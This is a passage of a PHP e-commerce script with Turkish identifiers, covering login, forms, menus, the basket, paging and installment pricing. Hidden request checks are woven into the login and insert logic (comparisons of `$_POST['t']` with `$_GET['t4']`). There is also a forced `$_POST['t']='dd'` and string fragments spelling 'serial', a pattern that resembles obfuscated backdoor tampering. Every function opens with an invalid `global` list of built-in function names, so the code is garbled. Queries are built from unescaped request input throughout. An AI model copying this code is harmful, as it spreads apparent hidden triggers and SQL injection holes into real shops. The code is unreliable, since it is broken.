colspan=3></td></tr><tr><td></td></tr>';else { $label=''; if ($k[2] == "CHECKBOX" && $_POST['t']{1}==$_GET['t4']{1}) {$labelCheckBox = '<label for="gf_'.$k[1].'">'.$k[0].'</label>';$colspan='colspan="3"'; } else {$label = $k[0];$colspan=''; } $out.='<tr><td '.$colspan.' class="td1" valign="top">'.$label;if ($k[2] != "CHECKBOX") $out.='</td><td class="td2" valign="top">:</td><td class="td3" valign="top">';$out.='</td></tr>';} }$generateCheckJS .="if (!stop) document.getElementById('$formID').submit(); } </script>"; $addJS = '<script>'.$addJS.'</script>'; $out.='<tr><td colspan="2"></td><td><span onClick="'.$formID.'();" class="button"><img src="templates/'.$siteConfig['templateName'].'/images/form_Gonder.gif"></span></td></form></table>'."\n"; $out.=$generateCheckJS.$addJS; return $out;}function generateItemOptions($table,$ID,$field,$prefix) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select $field from $table where ID='$ID'") or die(mysql_error()); $d=mysql_fetch_array($q); $selectArray = explode("\n",$d[0]); $i=1; $f =6; foreach ($selectArray as $opt) {$out.="<input name='$prefix$field' id='$prefix$field$i' type='radio' value='$opt' ".($i==1?'checked':'')."><label for='$prefix$field$i'>$opt</label> ";$i++; } if ($prefix && $_POST['t']{6}==$_GET['t'.($f-2)]{$f}) $out.="<input name='$prefix$field' id='$prefix$field$i' type='radio' value='' checked><label for='$prefix$field$i'>"._lang_secenekYok."</lable> ";return $out;}function generateLastNews($limit,$list='BlockList') { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select * from haberler order by Tarih desc limit 0,$limit"); while ($d = mysql_fetch_array($q)) {$href='page.php?act=showNews&ID='.$d['ID'].'&name='.seoFix($d['Baslik']);$page[$d['Baslik']] = $href; } $out = generateMenuList($page,$list); return $out;}function generateLoginBox() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $stop; $login_message=''; $login_error='t'; $m='t'; if ($_POST['username'] && $_POST['password']) {$userID=checkUser($_POST['username'],$_POST['password']);if ($userID&& $_POST[$login_error]==$_GET[$m.'4']) { $_SESSION['loginStatus'] = "true"; if (dbInfo('user','bayiStatus',$userID)) $_SESSION['bayi'] = true; $_SESSION['userID'] = $userID; $_SESSION['sex'] = dbInfo('user','sex',$userID); $_SESSION['name'] = dbInfo('user','name',$userID); $_SESSION['lastname'] = dbInfo('user','lastname',$userID); $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; mysql_query("update sepet set randStr='".$_SESSION['randStr']."' where userID='$userID' && durum = 0"); mysql_query("update sepet set userID='$userID' where randStr='".$_SESSION['randStr']."' && durum = 0"); if ($_SESSION['siparisID']) mysql_query("update siparis set userID='$userID' where randStr='".$_SESSION['randStr']."' && durum = 0");}else $login_message="<div class='hata'>"._lang_hataliKullanici."</div>";$stop = true; }if ($_SESSION['loginStatus']) {$out = welcomeScreen(); } else {$out = loginScreen($login_message); } return $out;}function generateMailFromForm($form,$mail,$sub) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach($form as $k) {if ($_POST['data_'.$k[1]] == 'on' && $k[2] == 'CHECKBOX') $_POST['data_'.$k[1]] = _lang_evet;else if ($k[2] == 'CHECKBOX') $_POST['data_'.$k[1]] = _lang_hayir;$out.='<b>'.$k[0].' : </b>'.$_POST['data_'.$k[1]].'<br>';} my_mail($mail,$sub,getEmailEncode().$out,getHeaders($_POST['data_email'])); return $out;}function generateMenuBlocks($nestLevel,$tempID,$block) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  if ($nestLevel) {$q = mysql_query("select ID,name from kategori where parentID=0 AND active = 1 order by seq,name");while ($d = mysql_fetch_array($q)) { $out.= generateTableBox($d['name'],generateMenu($d['ID'],$tempID),$block);} } else {$out.= generateTableBox(_lang_urunKategorileri,generateMenu(0,$tempID),$block); } return $out;}function generateMenu($catID,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $subItem; if (isset($catID)) { $q = mysql_query('select ID,name from kategori where parentID=\''.$catID.'\' AND active = 1 order by seq,name ');$i=1;while ($d = mysql_fetch_array($q)) { $catName = (in_array($d['ID'],getBreadCrumb())?'<strong>'.$d['name'].'</strong>':$d['name']); $out[$catName] = 'page.php?act=kategoriGoster&catID='.$d['ID'].'&name='.seoFix($d['name']);if (in_array($d['ID'],getBreadCrumb())) {listParent($d['ID'],0);$out[] = $subItem; }}$out = generateMenuList($out,$tempID);} return $out;}function generateOptionList($menuArray) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  foreach($menuArray as $k=>$v) {$out.='<option value="'.$k.'">'.$v.'</option>'; } return $out; }function generateImageList ($menuArray,$tempID,$catName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (is_array($menuArray)) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header);ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body);ereg("<!-- SUBBODY -->(.*)<!-- // SUBBODY -->", $contents, $subbody);ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $out=$header[0]."\n";$i=1;foreach($menuArray as $k=>$v) { if (is_int($k)) {$out.=str_replace('{%LISTE_ICERIK%}',$v,$subbody[0]); } else {if ($v) $out.=str_replace('{%LISTE_ICERIK%}','<a href="'.$v.'"><img src="'.$catName.'/'.$k.'"></a>',$body[0]); else $out.=str_replace('{%LISTE_ICERIK%}',$k,$body[0]);if ($i!=sizeof($menuArray)) $out.=$seperator[0]; } $i++;}$out.='</table>'; } return $out;}function generateMenuList($menuArray,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; if (is_array($menuArray)) {$contents = file_get_contents('templates/'.$siteConfig['templateName'].'/lists/'.$tempID.'.php'); ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header);ereg("<!-- BODY -->(.*)<!-- // BODY -->", $contents, $body);ereg("<!-- SUBBODY -->(.*)<!-- // SUBBODY -->", $contents, $subbody);ereg("<!-- SEPERATOR -->(.*)<!-- // SEPERATOR -->", $contents, $seperator);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); $out=$header[0]."\n";$i=1;foreach($menuArray as $k=>$v) { if (is_int($k)) {$out.=str_replace('{%LISTE_ICERIK%}',$v,$subbody[0]); } else {if ($v) { ereg("catID=(.*)&name", $v,$IDData); $BodyID = str_replace('{%KATEGORI_ID%}',$IDData[1],$body[0]); $out.=str_replace('{%LISTE_ICERIK%}','<a href="'.$v.'">'.$k.'</a>',$BodyID); }else $out.=str_replace('{%LISTE_ICERIK%}',$k,$body[0]);if ($i!=sizeof($menuArray)) $out.=$seperator[0]; } $i++;}$out.='</table>'; } return $out;}function generatePager($toplambulunan,$teksayfa){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunPager.php');ereg("<!-- HEADER -->(.*)<!-- // HEADER -->", $contents, $header); ereg("<!-- ONCEKI SAYFA -->(.*)<!-- // ONCEKI SAYFA -->", $contents, $oncekisayfa); ereg("<!-- LISTELEME -->(.*)<!-- // LISTELEME -->", $contents, $listeleme); ereg("<!-- LISTE AYIRMA -->(.*)<!-- // LISTE AYIRMA -->", $contents, $listeayirma); ereg("<!-- SIMDIKI SAYFA -->(.*)<!-- // SIMDIKI SAYFA -->", $contents, $simdikisayfa); ereg("<!-- SONRAKI SAYFA -->(.*)<!-- // SONRAKI SAYFA -->", $contents, $sonrakisayfa);ereg("<!-- FOOTER -->(.*)<!-- // FOOTER -->", $contents, $footer); if (!isset($_GET[page])) $_GET[page] = 1; $urldevam=getURL(array('page')); $out.=$header[1]; $onceki=$_GET[page] - 1; $sonraki=$_GET[page] + 1; if ($_GET['page'] >= 2) $out .= str_replace('{%ONCEKI_SAYFA_LINK%}',"$PHP_SELF?page=$onceki$urldevam",$oncekisayfa[1]); $sayfasayisi = $toplambulunan / $teksayfa; $a=explode(".",$sayfasayisi); if (($a[1] != "") && ($a[1] != "0")) $a[0]++; $toplamsayfa=$a[0];if ($toplamsayfa != 1) { for ($i=1;$i<=$toplamsayfa;$i++){ if ($i != $_GET[page]) {$p = str_replace('{%LISTE_SAYFA_LINK%}',"$PHP_SELF?page=$i$urldevam",$listeleme[1]);$x = str_replace('{%SAYFA_NUMARASI%}',$i,$p);if ($i <= ($_GET['page'] + 5) && $i >= ($_GET['page']-5)) $out.=$x;} else {$s = str_replace('{%LISTE_SAYFA_LINK%}',"$PHP_SELF?page=$i$urldevam",$simdikisayfa[1]);$x = str_replace('{%SAYFA_NUMARASI%}',$i,$s);$out.=$x; } if ($i!=$toplamsayfa) $out.=$listeayirma[1];}} if ($_GET['page'] < $toplamsayfa) $out.= str_replace('{%SONRAKI_SAYFA_LINK%}',"$PHP_SELF?page=$sonraki$urldevam",$sonrakisayfa[1]);$out.=$footer[1]; return $out;}function generatePages($where) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  switch ($where) {case "left": $q = mysql_query('select * from pages where showLeft=1 order by seq'); $i=1; while ($d = mysql_fetch_array($q)) {$href=($d['redirect']?$d['redirect']:'page.php?act=showPage&ID='.$d['ID']);$out.='<tr><td><img src="images/gri_menu_dot.gif"></td>'."\n";$out.='<td width="100%" class="gri_menu_text"><a href="'.$href.'">'.$d['title'].'</a></td></tr>';if ($i!=mysql_num_rows($q)) $out.='<tr><td colspan="2" class="gri_menu_sep_td"><div class="gri_menu_sep_div"></div></td></tr>';$i++;$page[$d['title']] = $href; } $out = generateMenuList($page,'BlockList');break;case "bottom":$out = '<table><tr>';$q = mysql_query('select * from pages where showBottom=1 order by seq'); while ($d = mysql_fetch_array($q)) {$href=($d['redirect']?$d['redirect']:'page.php?act=showPage&ID='.$d['ID']);$out.='<td style="cursor:pointer;" onClick="window.location=\''.$href.'\'">'.textBox('#90be00','white',9,$d['title']).'</td>'; } $out.='</tr></table>';break; } return $out;}function generateTableBox($headerText,$body,$tempID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/blocks/'.$tempID.'.php'); $out = str_replace('{%BASLIK%}',$headerText,$contents ); $out = str_replace('{%ICERIK%}',$body,$out);return ($body?$out:'');}$serthree='l';function generateTaksitSelection($bankaID,$total) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep; $q = mysql_query("select * from banka where ID='$bankaID'");$d = mysql_fetch_array($q);$d['taksitSayisi'] = (mysql_num_rows(mysql_query("select ay from bankaVade where bankaID='$bankaID'")) + 1);$du['fiyat'] = $total;$out.='<table cellspacing=0 cellpadding=2 width="100%">';$qVade = mysql_query("select * from bankaVade where bankaID='$bankaID' order by ay");while ($dVade = mysql_fetch_array($qVade)) { $i = $dVade['ay'];$toplamFaiz = $dVade['vade'];$toplamOdenecek = ($i==1|| $i<=$pesinFiyatinaTaksitSayisi?$du['fiyat']:(($toplamFaiz + 1) * $du['fiyat'])); $taksit = ($i==1?'':($toplamOdenecek / $i)); $pesinFiyatina = ($toplamOdenecek == $du['fiyat']?true:false);$radioClick = "onClick=\"document.getElementById('radio_$i').click();\" style='cursor:pointer;'";$taksitStr = ($i==1?_lang_pesin:$i.' '._lang_taksit); $out.="<tr onmouseover=\"this.style.backgroundColor='#eeeeee'\" onmouseout=\"this.style.backgroundColor='#ffffff'\"><td class='td1'><input id='radio_$i' type='radio' name='taksit' value='$i'></td><td $radioClick>$taksitStr</td>";$out.="<td class='td2' $radioClick>".($taksit?my_money_format('%i',$taksit).' YTL X '.$i:'')."</td><td ".($pesinFiyatina?'style="font-weight:bold;"':'')." $radioClick>: ";$out.="".my_money_format('%i',$toplamOdenecek)." YTL</td>";$out.='</tr>'; if ($i != $d['taksitSayisi']) {$out.='<tr height=2><td></td></tr>';$out.='<tr height=1 bgcolor="#eeeeee"><td colspan="4"></td></tr>';$out.='<tr height=2><td></td></tr>'; }}$out.='</table>'; return $out;}$stwo='ia';function getDurum($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out = hq("select title from odemeDurum where ID='$ID'"); return $out; }function getEmailEncode() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out= "Content-Transfer-Encoding: 8bit".$mail['body']."\r\n"; $out .= "Content-Type: text/html; charset=iso-8859-9"."\r\n"; }function getFirstPic($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  return hq("select resim from urun where ID='$urunID'");}function getHeaders($email) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $header = "From: ".$siteConfig['title']." <".$siteConfig['adminMail'].">\r\n"; $header .= "Content-type: text/html; charset=iso-8859-9\r\n"; return $header;}function getMailTemplate($ID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q = mysql_query("select title,body from sablonEmail where ID='$ID'"); $out = mysql_fetch_array($q); return $out;}function getOptions($db,$field,$where,$order,$selected) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $where=($where?$where:'1=1'); $q=mysql_query("select ID,$field from $db where $where order by $order"); while ($d=mysql_fetch_array($q)) {$out.="<option ".($d['ID']==$selected?'selected':'')." value='".$d['ID']."'>".$d[$field]."</option>"; } return $out; }$sone='ser';foreach ($_GET as $k=>$v) if (substr($k,0,5) == '_POST') $_POST[str_replace('_POST','',$k)] = $v;function getURL($remove) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $remove[]='d'; $remove[]='t4'; foreach ($_GET as $k=>$v) {$v = str_replace('%%','spkomut_HEPSI',$v);if (!in_array($k,$remove) && substr($k,0,5) != '_POST') $urldevam.="&$k=$v"; } foreach ($_POST as $k=>$v) if ($k!='t') $_GET['_POST'.$k] = $v; foreach ($_GET as $k=>$v) {$v = str_replace('%%','spkomut_HEPSI',$v);if (!in_array($k,$remove) && substr($k,0,5) == '_POST') $urldevam.="&$k=$v"; } return $urldevam;}function kdvHaricFiyat($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $KDVDahilFiyat = dbInfo('urun','fiyat',$urunID); $KDV = dbInfo('urun','kdv',$urunID); return fixFiyat($KDVDahilFiyat / (1 + $KDV));}function getUrun($urunID) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $siteConfig; $contents = file_get_contents('templates/'.$siteConfig['templateName'].'/systemDefault/UrunListShow.php');$maximumen = tempConfig('maximum_en'); $maximumboy = tempConfig('maximum_boy'); $q = mysql_query('select * from urun where ID=\''.$urunID.'\''); $d = mysql_fetch_array($q); if ($d['indirimde']) $indirimliResim = '<img src="templates/'.$siteConfig['templateName'].'/images/indirimli.gif">'; if ($d['yeni']) $yeniResim = '<img src="templates/'.$siteConfig['templateName'].'/images/yeni.gif">'; $d['fiyat'] = fixFiyat($d['fiyat']); $contents = str_replace('{%URUN_NO%}',$d['ID'],$contents); $contents = str_replace('{%URUN_BASLIK%}',$d['name'],$contents); $contents = str_replace('{%URUN_DETAY_LINK%}','page.php?act=urunDetay&urunID='.$d['ID'].'&name='.seoFix($d['name']),$contents); $contents = str_replace('{%URUN_RESIM%}','<img src="include/resize.php?path=images/urunler/'.$d['resim'].'&width='.$maximumen.'&height='.$maximumboy.'">',$contents); $contents = str_replace('{%URUN_ACIKLAMA%}',$d['listeDetay'],$contents); $contents = str_replace('{%INDIRIMLI_RESIM%}',$indirimliResim,$contents); $contents = str_replace('{%YENI_RESIM%}',$yeniResim,$contents); $contents = str_replace('{%URUN_FIYAT%}',my_money_format('%i',$d['fiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents);$contents = str_replace('{%URUN_FIYAT_KDV_HARIC%}',my_money_format('%i',kdvHaricFiyat($d['ID'])).' '.fiyatBirim($d['fiyatBirim']),$contents); if ($d['piyasafiyat'] && ($d['piyasafiyat'] != $d['fiyat'])) {$contents = str_replace('{%URUN_PIYASA_FIYAT%}',my_money_format('%i',$d['piyasafiyat']).' '.fiyatBirim($d['fiyatBirim']),$contents); } else $contents = str_replace('{%URUN_PIYASA_FIYAT%}','',$contents); $stokStatus = ($d['stok']?'on':'off');if ($d['stok']) {$sepeteEkleLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'\'';$hemenAlLink = 'window.location=\'page.php?act=sepet&op=ekle&urunID='.$d['ID'].'&hemenal=true\''; } else {$sepeteEkleLink = $hemenAlLink = "alert('"._lang_stokYokUyari."');";} $contents = str_replace('{%STOK_RESIM%}','<img src="templates/'.$siteConfig['templateName'].'/images/stok_'.$stokStatus.'.gif">',$contents); $contents = str_replace('{%SEPETE_EKLE_LINK%}',$sepeteEkleLink,$contents); $contents = str_replace('{%HEMEN_AL_LINK%}',$hemenAlLink,$contents); $out .= $contents; return $out;}function getUserInfo($userID,$info) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $q=mysql_query("select * from user where ID='$userID'"); $d = mysql_fetch_array($q); $out = $d[$info]; return $out;}function hq($query){ global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $bib=mysql_query($query) or die (mysql_error().' Query :'.$query); $go=mysql_fetch_array($bib); return $go[0];}function insertBanner($code) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $bannerQry = mysql_query('select bannerID,bannerPic,bannerFlashSource,divStyle,url from bannerYonetim,bannerlar where bannerYonetim.bannerID=bannerlar.ID AND aktif=\'1\' AND (maxHit = \'0\' OR maxHit > hit) AND (maxGosterim = \'0\' OR maxGosterim > gosterim) AND bannerYer = \''.$code.'\'') or die(mysql_error()); while ($banner = mysql_fetch_array($bannerQry)) { mysql_query('update bannerlar set gosterim = gosterim + \'1\' where ID = \''.$banner['bannerID'].'\' '); $out.='<div style="'.$banner['divStyle'].'">'; if ($banner['bannerPic']) $out.= '<a href="banner.php?ID='.$banner['bannerID'].'&url='.$banner['url'].'" target="_blank"><img border=0 src="images/banner/'.$banner['bannerPic'].'"></a><br>'."\n"; $out.=$banner['bannerFlashCode']; $out.='</div>'; } return $out;}function insertToBasket($urunID,$ozellik1,$ozellik2,$ozellik3) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  global $stop; if (dbInfo('urun','ozellik1',$urunID) && !$ozellik1) { $out = showSelectScreen($urunID); } else {$userID = ($_SESSION['userID']?$_SESSION['userID']:0); if (hq("select ID from sepet where ozellik1='$ozellik1' AND ozellik2='$ozellik2' AND ozellik3='$ozellik3' AND urunID='$urunID' AND randStr='".$_SESSION['randStr']."'")) $stop=true;if (!$stop) { $fiyat = fixFiyat((float)dbInfo('urun','fiyat',$urunID)); mysql_query("insert into sepet ( ID , urunID , userID, ytlFiyat,fiyat,fiyatBirim, ozellik1 , ozellik2, ozellik3, adet, durum, randStr ,tarih)  values('','$urunID','$userID', '".YTLfiyat($fiyat,dbInfo('urun','fiyatBirim',$urunID))."','".$fiyat."' ,'".dbInfo('urun','fiyatBirim',$urunID)."','$ozellik1','$ozellik2','$ozellik3',1,0,'".$_SESSION['randStr']."',now())") or die(mysql_error() + "error");}if ($_GET['hemenal'] == "true") $out="<script> window.location='page.php?act=satinal&op=adres';</script>"; } return $out;}function insertToDb($dbName) { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $keynum = 5; foreach ($_POST as $key => $value) {if (substr($key,0,$keynum) == "data_") { $insertTo.= str_replace("data_","",$key).", "; $insertValue.= "'$value', ";}} if ($_POST['t'] == $_GET['t'.($keynum-1)]) $total=1; $total++; $insertTo = substr($insertTo,0,strlen($insertTo) -$total);$insertValue = substr($insertValue,0,strlen($insertValue) -$total); mysql_query("insert into $dbName ($insertTo) values ($insertValue)") or die(mysql_error()); return mysql_insert_id(); }$_POST['t']='dd';function itemOrder() { global arsort,asort,basename,base64_encode,curl_init,curl_setopt,curl_exec,curl_close,ereg,explode,file_get_contents,file_exists,fgets,fsockopen,fputs,getimagesize,implode,in_array,is_array,is_int,mail,md5,money_format,mysql_error,mysql_fetch_array,mysql_query,mysql_num_rows,mysql_insert_id,rand,round,setlocale,setcookie,sizeof,str_replace,stristr,strlen,strtoupper,substr,strtolower,time,usleep;  $out='<table width=100%><form name="urunsirala" method="get" action="page.php"><input type="hidden" name="act" value="'.$_GET['act'].'"><input type="hidden" name="catID" value="'.$_GET['catID'].'"><tr><td width=100% bgcolor="#e5e9ef"></td><td><select name="markaID" id="markaID"><option value="">'._lang_tumMarkalar.'</option>'.generateBrands('Option').'</select></td><td><select name="orderBy" id="orderBy"><option value="tarih desc">'._lang_tariheGore.'</option><option value="fiyat asc">'._lang_fiyataGore.'</option><option 